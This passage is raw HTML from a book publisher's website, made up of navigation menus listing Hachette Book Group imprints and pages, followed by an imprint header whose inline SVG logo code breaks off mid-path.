class="site-header__menu-item-text"><a href="https://www.storey.com" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Storey Publishing">Storey Publishing</a></span></li>	</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Perseus">Perseus</a><span id="expand-site-header__sub-menu-1214155658" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1214155658" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1214155658" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3879144488  desc-arrow-2655248275">
	<title id="titlet-arrow-3879144488">Arrow Icon</title>
	<desc id="desc-arrow-2655248275">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1214155658" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1214155658"><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/avalon-travel/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Avalon Travel">Avalon Travel</a><span id="expand-site-header__sub-menu-1846024730" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1846024730" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1846024730" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2602705619  desc-arrow-2280218606">
	<title id="titlet-arrow-2602705619">Arrow Icon</title>
	<desc id="desc-arrow-2280218606">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span></li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/basic-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Basic Books">Basic Books</a><span id="expand-site-header__sub-menu-1165430272" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1165430272" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1165430272" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-4037737804  desc-arrow-3945885803">
	<title id="titlet-arrow-4037737804">Arrow Icon</title>
	<desc id="desc-arrow-3945885803">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span></li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/hachette-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Hachette Books">Hachette Books</a><span id="expand-site-header__sub-menu-1710662248" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1710662248" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1710662248" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-4160510985  desc-arrow-365735214">
	<title id="titlet-arrow-4160510985">Arrow Icon</title>
	<desc id="desc-arrow-365735214">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span></li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/publicaffairs/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="PublicAffairs">PublicAffairs</a><span id="expand-site-header__sub-menu-1992790890" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1992790890" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1992790890" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1108727364  desc-arrow-839771260">
	<title id="titlet-arrow-1108727364">Arrow Icon</title>
	<desc id="desc-arrow-839771260">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span></li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/running-press/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Running Press">Running Press</a><span id="expand-site-header__sub-menu-103850912" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-103850912" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-103850912" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1645150231  desc-arrow-1599484358">
	<title id="titlet-arrow-1645150231">Arrow Icon</title>
	<desc id="desc-arrow-1599484358">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span></li>	</ul>
</li></ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/video/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Videos">Videos</a><span id="expand-site-header__sub-menu-879989883" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-879989883" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-879989883" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2035337175  desc-arrow-2632081421">
	<title id="titlet-arrow-2035337175">Arrow Icon</title>
	<desc id="desc-arrow-2632081421">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-879989883" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-879989883"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/author-inquiry/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Author Inquiry">Author Inquiry</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/book-trailers/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Book Trailers">Book Trailers</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/the-current/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="The Current">The Current</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/meet-the-author-video/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Meet the Author">Meet the Author</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/wordsmithing/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Wordsmithing">Wordsmithing</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/bold-recommendations/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Bold Recommendations">Bold Recommendations</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="/landing-page/book-your-next-romance/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Book Your Next Romance">Book Your Next Romance</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="/landing-page/shelf-life/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Shelf Life">Shelf Life</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="/landing-page/hbg-films/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="HBG Films">HBG Films</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/recommendations-from-the-african-diaspora/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Recommendations from the African Diaspora">Recommendations from the African Diaspora</a></span></li></ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/blogs-hub" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Blogs">Blogs</a><span id="expand-site-header__sub-menu-1556610816" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1556610816" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1556610816" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3437047972  desc-arrow-725538912">
	<title id="titlet-arrow-3437047972">Arrow Icon</title>
	<desc id="desc-arrow-725538912">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1556610816" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1556610816"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.novelsuspects.com/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Novel Suspects">Novel Suspects</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/the-current/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="The Current">The Current</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/open-book/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Open Book">Open Book</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/bookmark/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Bookmark Book Club">Bookmark Book Club</a></span></li></ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/about-hachette-book-group-2/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="About">About</a><span id="expand-site-header__sub-menu-122676666" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-122676666" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-122676666" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1896176049  desc-arrow-3197535786">
	<title id="titlet-arrow-1896176049">Arrow Icon</title>
	<desc id="desc-arrow-3197535786">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-122676666" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-122676666"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/about-hachette-book-group-2/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="About Hachette Book Group">About Hachette Book Group</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/about/careers/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Careers">Careers</a></span></li></ul>
</li></ul></div>	</nav>
</header>

<header id="site-header" class="site-header imprint-header center-street ">
	<a href="#content" class="skiplink">Skip to Main Content</a>
	
<div class="site-header__top site-header__default" data-toggle-element="site-header__search">
	<div class="site-header__mobile-menu-toggle">
		<button class="site-header__hamburger toggleable" data-toggle-target="site-header__mobile-menu" data-toggle-block="site-header__mobile-menu">&#9776;</button>
	</div>

	<h2 class="site-header__branding">
		
	<a class="site-header__branding--imprint-header-logo__desktop" href="https://www.centerstreet.com/">
		<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 288 98.1"><defs><style>.cls-1{fill:#231f20;}</style></defs><title>Center Street logo</title><path class="cls-1" d="M38.91,44.41v0l-.79.15h-.53v0a2.27,2.27,0,0,1-.79,0h-.53v0H36v0H35.7v0h-.22l-.87-.23a1.86,1.86,0,0,0,.19.34.83.83,0,0,0,0,.15l.07,0v.08l.08.07v.08h0V45h0v.08l.08,0v.07l.07.08v.07h0v.08l.08,0v.08l.07.08v.07h0v.08l.08,0v.08l.07.08V46h0v.08l.07,0,.08.23.08,0v.07l.07.08v.07h0v.08l.07,0a2,2,0,0,1,.08.22l.08,0,.07.23.08,0,.07.22.08,0,0,.15.07,0v.07h0v.08h0l0,.11h.08a3.2,3.2,0,0,1,.26-1l0-.22h0l0-.16h0v-.11h0c0-.07,0-.15.08-.23h0l0-.15.08,0,0-.15.07,0c0-.05,0-.1,0-.15l.07,0v-.08l.08,0,0-.12.11-.07v-.08l.11-.07V45.2l.27-.23a3.19,3.19,0,0,1,.6-.56Zm-3-1.51h.52a2.52,2.52,0,0,0,.83,0v0h.53v0l.61,0v0h.18v0h.19v0h.15v0H39v0l.33-.07v0h.08v0h.11v0l.23-.08v0l.15,0,0-.08H40a.3.3,0,0,0,0-.08h.08l.11-.15h.08v0l.15-.12v-.07l.15-.12v-.07l.07,0v-.07h0c0-.06,0-.11,0-.16h0a1.82,1.82,0,0,0-.08-1.47l-.15-.11-.15-.19-.23-.07v0h-.11v0a1.19,1.19,0,0,0-.53,0v0l-.19,0,0,.07h-.07l-.08.08v.07l-.07,0c0,.05,0,.1,0,.15h0V40h0v.18h0v.68h0a1.06,1.06,0,0,1,0,.19l-.07,0v.08l-.08.07h-.07l0,.08a1.46,1.46,0,0,1-.76.11.77.77,0,0,0-.3-.19c0-.14-.11-.25-.15-.38a2.35,2.35,0,0,1,.08-.9l0-.3a2.85,2.85,0,0,1,1-1.48v0l-9.09.07v.08a.94.94,0,0,1,.3.15h.08l0,.07.16,0,0,.08.15,0,0,.07h.08l.07.11h.08l0,.08h.07l.08.11h.07l.12.15H31l.19.23.11,0,.38.41.23.19v.08l.26.22v.08l.19.15a.36.36,0,0,0,0,.11l.07,0v.08l.15.11,0,.11.08,0v.08l.07,0v.08l.11.07v.08h0a.76.76,0,0,1,0,.11l.08,0v.08l.11.07v.08l.07,0v.08h0V42l.08,0v.08h0l.11.15.23.08v0l.22.08v0H34v0h.08v0h.11v0h.12v0h.11v0h.11v0l1.29.23ZM13.93,19.69v-.07h0l-.08-.23-.07,0v-.07l-.12-.08L13.44,19h-.07l0-.08h-.07v0L13,18.79v0h-.11v0h-.16v0a1.48,1.48,0,0,0-1,.22l-.12.15-.22.19v.08l-.08,0v.08l-.07,0,0,.15h0v.11h0v.08h0V20h0v.15h0v.34a3.32,3.32,0,0,0,0,.79V36.75l3.1.45h0v-16A4,4,0,0,0,14,19.69Zm40-6H51.67V66.18l-3.93.11H46.61c-.14,0-.34,0-.42,0a.54.54,0,0,1-.15,0V13.73H44.42a2.89,2.89,0,0,1-.79,0V11.92h10.3ZM45.18,50.45v.18h0v.12h0v.15h0V51h0v.12h0l-.08.22h0l0,.15h0s0,.08,0,.12l-.08,0v.08l-.07,0v.07l-.19.15V52l-.07,0-.16.19h-.07l-.15.18h-.08l-.07.12h-.08l0,.07-.11,0v0l-.15,0,0,.07-.15,0v0l-.15,0v0H43v0l-.15,0v0l-.8.22h-.18a3.21,3.21,0,0,1-1.51,0h-.19v0l-.3,0v0h-.12v0h-.07v0h-.12v0h-.07v0h-.12v0l-.22-.07v0l-.15,0,0-.08-.15,0,0-.08h-.07l0-.07h-.08l-.07-.12h-.08l0-.07h-.07l-.08-.12-.11,0L37.89,52h-.07l-.15-.19-.34-.3v-.07l-.3-.27v-.07l-.19-.15v-.08l-.12-.08v-.07l-.15-.11v-.08l-.11-.07v-.08l-.08,0v-.07l-.11-.08v-.07l-.07,0,0-.12h0v-.07L36,49.8v-.07l-.08,0,0-.15-.07,0v-.07l-.08,0v-.08l-.07,0V49.2l-.08,0v-.07h0V49l-.07,0s0-.1,0-.15l-.07,0a.83.83,0,0,1,0-.15l-.08,0,0-.15-.07,0s0-.1,0-.15l-.07,0L35,48l-.08,0-.07-.22-.08,0v-.07l-.07-.08v-.08l-.08,0v-.08l-.07-.07V47.2h0v-.08l-.08,0V47l-.07-.07,0-.15-.07,0v-.08l-.08-.07v-.08h0v-.07l-.07,0,0-.15h0v-.08h0v-.07h0V46L33.78,46v-.08l-.07,0-.27-.6-.07,0v-.08l-.08-.07V45h0V44.9h0v-.08h0l0-.15-.08,0v-.07L33,44.48l0-.15-.08,0v-.07l-.07-.08v-.07h0V44l-.07,0c0-.08,0-.16-.08-.23l-.07,0a.83.83,0,0,1,0-.15l-.08,0,0-.15-.07,0c0-.05,0-.1,0-.15l-.07,0,0-.12h0l0-.15-.07,0v-.07l-.08,0v-.08l-.07,0v-.08h0l0-.11-.07,0V42.3l-.12-.08v-.08l-.11-.07V42l-.11-.07v-.08l-.12-.07v-.08l-.15-.11V41.5l-.22-.19v-.07l-.38-.34-.34-.38h-.08l-.15-.19h-.07l-.12-.15h-.07l-.08-.11h-.07l0-.08-.11,0v0l-.15,0,0-.08L29,39.73v0h-.07v0l-.23-.07v0h-.11v0h-.08v0h-.11v0h-.12v0h-.11v0H28v0h-.15A3.83,3.83,0,0,0,26,39.24l-.68.11v0h-.11v0a2.82,2.82,0,0,0-.31.07v0l-.15,0v0l-.19,0,0,.08-.15,0v0l-.12,0,0,.08h-.07l-.15.19h-.08l-.07.11h0v.08l-.19.15v.07l-.07,0,0,.15h0l0,.15h0a2.71,2.71,0,0,0-.11,1.06h0v.22h0v.16h0v.11h0v.11h0v.11h0l0,.16h0l0,.18.08,0,.07.23.08,0v.07l.11.08v.07l.34.3.15.19h.08l.07.12.23.07,0,.08H25v0h.07v0a2.57,2.57,0,0,0,1,.12v0l.3,0v0h.07v0h.12v0l.15,0v0h.07l0-.07h.08L27,44H27l.07-.11a1,1,0,0,1,.57-.11c.06.07.08,0,.15.07l0,.08h.07L28,44l.08,0a1.18,1.18,0,0,1,.07.56c-.07.07,0,.09-.07.16l-.08,0-.23.27a5.11,5.11,0,0,1-1.28.64h-.19a3.17,3.17,0,0,1-1.85-.15l-.22,0v0L24,45.43v0l-.23-.08,0-.07-.15,0,0-.08h-.08l0-.07-.11,0-.07-.11h-.08l-.26-.3-.23-.19v-.08l-.11-.07v-.08l-.12-.07V44l-.07,0,0-.15-.07,0,0-.15h0l0-.15h0l-.26-.9v-.3a2.33,2.33,0,0,1,0-.8h0v-.3h0V41h0v-.15h0v-.15l.34-.83.08,0,0-.15h0l0-.11.08,0v-.07l.11-.08v-.07l.38-.34.22-.27h.08l.07-.11h.08l0-.08h.07l0-.07a.64.64,0,0,1,.27-.11v-.08c-.95.09-2.06,0-3.06,0l-3.7,0-3,0c-.33-.09-.79-.09-1.13-.19h-.3v0h-.26v0h-.31v0h-.3v0h-.26v0h-.3v0H11a3.58,3.58,0,0,0-.68-.11l0-3.06a8.22,8.22,0,0,0,0-1.66l0-9V22.64a3.29,3.29,0,0,1,0-.79c.06-.22,0-.57,0-.76v-.41h0v-.27h0v-.23h0V20h0v-.15h0l0-.22h0v-.08h0l0-.19.07,0,0-.15.07,0v-.08l.16-.11V18.9l.07,0,.23-.26h.07l.12-.15A3.87,3.87,0,0,1,12.54,18h.22v0H13v0h.3v0h.46v0l1.47,0a4.08,4.08,0,0,1,.94,0h.6v0a4.61,4.61,0,0,1,1,0l3.47,0a4.08,4.08,0,0,0,.94,0l1.28,0v11h1.4v-11l5.66,0h1.85a4.08,4.08,0,0,1,.94,0l6,0H44c.13,0,.31,0,.38,0a1.54,1.54,0,0,1,.45,0V38l-3.62,0s.06,0,.11.07v0h.07l.08.12h.08l.11.15h.07a1,1,0,0,1,.08.11h0v.08l.19.15v.07l.07,0V39l.08,0,0,.15h0l0,.15h0a1.57,1.57,0,0,0,0,.23h0a2.89,2.89,0,0,1,.12,1.06v.3h0v.23h0v.18h0v.12h0a2.34,2.34,0,0,0,0,.26h0c0,.06,0,.13,0,.19h0l0,.15h0v.11l-.08,0v.08h0v.07l-.08.08v.07h0l0,.12-.08,0v.08l-.11.08v.07l-.12.08V43l-.07,0-.19.23c-.09.07-.17.08-.23.18H41c.15.14.5,0,.68,0v0h.49v0h.22v0h.15v0h.12v0h.11v0l.23.08v0l.15,0,0,.08h.07l.11.15h.08v0l.15.11v.07l.15.12v.07l.08,0,0,.15.08,0v.08h0v.11h0V45h0v.12h0v.11h0v.15h0v.15h0v.3h0v.49h0v.31h0v.19h0v.15h0v.11h0v.11h0v.12h0l-.08.22h0l0,.15-.08,0v.08a2.4,2.4,0,0,1-1.28.83H41.7a2.13,2.13,0,0,1-1.32-1v-.41l.19-.27c.09-.06.2-.07.27-.15h.41v0l.15,0,.08.11h.07l.12.15h.07v0h.12v0l.26,0v0a1.51,1.51,0,0,0,.57-1.54h0v-.08h0s0-.1,0-.15l-.15-.11v0h-.07a.3.3,0,0,1,0-.08h-.12v0h-.07v0H42v0h-.23a1,1,0,0,0-.41,0v0h-.27v0l-.3,0v0h-.11v0l-.19,0v0l-.15,0v0h-.08l0,.08h-.07l0,.07H40l-.15.19h-.08l-.11.15-.31.27v.07l-.18.15v.08l-.12.07v.08l-.07,0v.07l-.08,0a.83.83,0,0,1,0,.15l-.07,0,0,.15h0l-.07.23h0v.11h0v.07h0l0,.23a2.85,2.85,0,0,0-.15,1.59v.18h0v.19c.1.24.2.48.31.72h0v.07h0l0,.23h0l.22.27h.08l.11.15h.08l.07.11.12,0,0,.07.15,0,0,.08.23.07v0l.22.07v0h.12a2.31,2.31,0,0,0,1.58.08H42v0h.08v0h.11v0h.08v0l.22-.08,0-.07h.08l.07-.12h.08l.22-.26.16-.11v-.08l.11-.08v-.07l.07,0,0-.15h0l.08-.23h0c.07-.22.13-.45.19-.68v-.26h0c0-.1,0-.18,0-.26l.07,0V49h0c.12-.13.13-.11.3-.19v0h.19v0l.34,0c.13.15.32.12.38.37s0,.25.07.42h0a2.34,2.34,0,0,1-.07.9ZM13.41,39.16a.29.29,0,0,0-.08.08h-.07l0,.07h-.08l0,.08H13l0,.08-.15,0,0,.08-.15,0,0,.07h-.07v0h-.08l0,.08-.12,0v0l-.15,0,0,.07L12,40l0,.08-.15,0,0,.08h-.08l0,.08-.15,0,0,.08h-.07v0h-.08l0,.07-.12,0v0l-.15,0,0,.07-.15,0,0,.07-.15,0,0,.08-.12,0v0l-.15,0,0,.08-.15,0,0,.08-.16,0,0,.07-.15,0,0,.08-.11,0v0l-.16,0,0,.07-.15,0,0,.08-.15,0,0,.08-.11,0v0l-.15,0,0,.08-.15,0,0,.07-.15,0,0,.08-.15,0,0,.08-.11,0v0l-.15,0,0,.08-.15,0,0,.08-.15,0,0,.07-.15,0,0,.08-.15,0,0,.08-.12,0v0l-.15,0,0,.08-.15,0,0,.07H6.54v0H6.46l0,.07-.16,0,0,.08H6.16v0H6.09l0,.07-.15,0,0,.07-.15,0,0,.08-.15,0,0,.07-.15,0,0,.07H5.22v0H5.14l0,.08-.23.07,0,.08H4.77l-.08.07H4.61v0H4.54v0H4.46l0,.07-.19,0v0l-.15,0v0H4v0H3.94v0H3.82v0H3.75v0l-.23,0v0H3.37c-.16.05-.5.15-.64,0l-.11-.07a1.15,1.15,0,0,1,0-.61h0v-.07l.12-.08v-.07L2.92,44l0-.07H3l.26-.3h.08l.15-.19H3.6l.15-.19h.07L4,43.05h.08l.11-.15h.08l.11-.15h.08l.11-.15h.07l.12-.15H4.8l0-.08.11,0,.12-.15h.07L5.26,42h.07l.08-.11h.07l.08-.12h.07l.12-.15h.07l.08-.11H6l.08-.11h.07l.12-.15h.07l.08-.12.11,0,0-.08h.07l.08-.11h.08l.07-.12h.08L7,40.71h.08l.07-.11h.08l.07-.12.12,0,0-.08h.08l.08-.11h.07l.08-.12h.07L7.9,40H8l.08-.11h.07l0-.08h.08l.07-.11h.08l.07-.11h.08l0-.08h.07l.08-.11.11,0,0-.08H9l0-.07h.08l.07-.11h.08l0-.08.11,0v0h.07l.08-.12H9.6l0-.07h.08l0-.08c.11-.07.22-.08.3-.19a3.45,3.45,0,0,1,.9.15h.23v0h.19v0h.19v0h.22c.23.06.53.12.76.19h.19a4.27,4.27,0,0,0,.68.15ZM23.44,13H28v3.24H24.8v1.51H23.44ZM46.08,9.7H52V11H46.08Zm4.68-2.27V8.71H47.21V7.39h2.42A4.19,4.19,0,0,1,50.76,7.43ZM46.68,4.15h0V3.92h0V3.77h0l0-.26h0L47,3.28h0l0-.15.08,0V3l.08,0V2.9l.18-.15a.36.36,0,0,0,0-.11h.08l.15-.19h.07a.25.25,0,0,0,0-.07h.08l0-.08h.08v0l.15,0v0l.34-.08v0h.19V2a2.63,2.63,0,0,1,.87.07h.15v0h.07v0h.12v0l.15,0v0H50l0,.08h.08l0,.07h.08l.07.11h.08a.2.2,0,0,0,0,.08l.19.15v.08l.11.07V3l.07,0v.07l.08,0v.07h0l0,.15h0v.12h0v.07h0V3.7h0v.15a2.78,2.78,0,0,1,.07,1h0V5h0v.15h0v.11h0v.11h0l0,.16h0l-.08.22-.07,0v.08L50.68,6V6l-.15.11-.19.23h-.07l0,.07-.11,0v0H50l0,.07-.64.23a4.52,4.52,0,0,1-1,0v0h-.11v0h-.11v0h-.08v0H48v0h-.08l-.08-.07h-.07l0-.08h-.07l-.12-.15h-.07l-.12-.15-.07,0V6l-.15-.12V5.85l-.08,0a.83.83,0,0,0,0-.15l-.07,0V5.55h0V5.43h0V5.36h0l0-.23a2.3,2.3,0,0,1-.12-1ZM.24-.23v68.9H55.48a7.43,7.43,0,0,0,1.58,0V-.23H.24"/><path class="cls-1" d="M5,72a4.85,4.85,0,0,1,1.85.27l.23,0v0l.23.08v0h.07v0l.23.08,0,.07.15,0,0,.08.16,0,0,.08a.78.78,0,0,0,.46.11l.07-.11h0v-.08h0c.07-.12.07-.2.26-.22,0,0,.1,0,.11.07l0,.23H9v1.66h0v.38a2.26,2.26,0,0,1,.07,1c-.1,0-.06.06-.22.07a.38.38,0,0,0-.08-.07v-.12h0v-.15h0V75.5h0v-.11h0l-.08-.23h0v-.08h0l0-.15-.07,0,0-.15-.08,0,0-.15-.07,0v-.08h0l0-.11-.07,0v-.07l-.11-.08v-.08L7.78,74v-.07l-.18-.15-.27-.31H7.26l-.15-.19H7l0-.07-.11,0v0H6.8l0-.07H6.69l0-.08-.15,0v0l-.23-.08v0H6.16v0H6.05v0H5.94v0H5.82v0H5.63a2.33,2.33,0,0,0-1.39.08l-.23,0v0l-.15,0v0H3.78l0,.07H3.67l0,.08H3.56l-.08.11H3.41l-.08.12-.26.22v.08l-.15.11v.08l-.08,0v.07l-.07,0,0,.11h0l-.07.23h0l-.08.22h0l-.3,1,0,.49h0l0,1.17h0v.49h0v.3h0v.22h0v.19l.3,1h0l.08.22h0v.08h0l.08.22.07,0,0,.15L3,80V80l.08,0v.08l.15.11v.08l.19.15v.07l.23.19,0,.08h.08l.15.19L4,81l0,.08h.08l0,.08.12,0v0l.15,0v0l.22.07v0l.34.08v0l.38,0v0H6v0h.23v0h.19v0h.11v0h.15v0H6.8v0h.08v0H7v0h.08v0h.11v0l.23-.07v0l.15,0,0-.08h.07l0-.07h.07l0-.08H7.9l0-.07H8l.15-.19h.08l.11-.15h0V80.4l.22-.19v-.07l.27-.23v-.07s.16-.06.19-.08v0c.07,0,0,0,.07,0s.08.15.08.3h0l0,.19h0v.08l-.07,0v.07H9v.08l-.11.07v.08l-.11.07v.08L8.58,81V81l-.38.34-.15.19H8l-.15.19-.11,0,0,.07H7.6l0,.08-.12,0v0l-.22.07,0,.08-.34.11v0H6.77v0H6.65v0H6.58v0l-.27,0v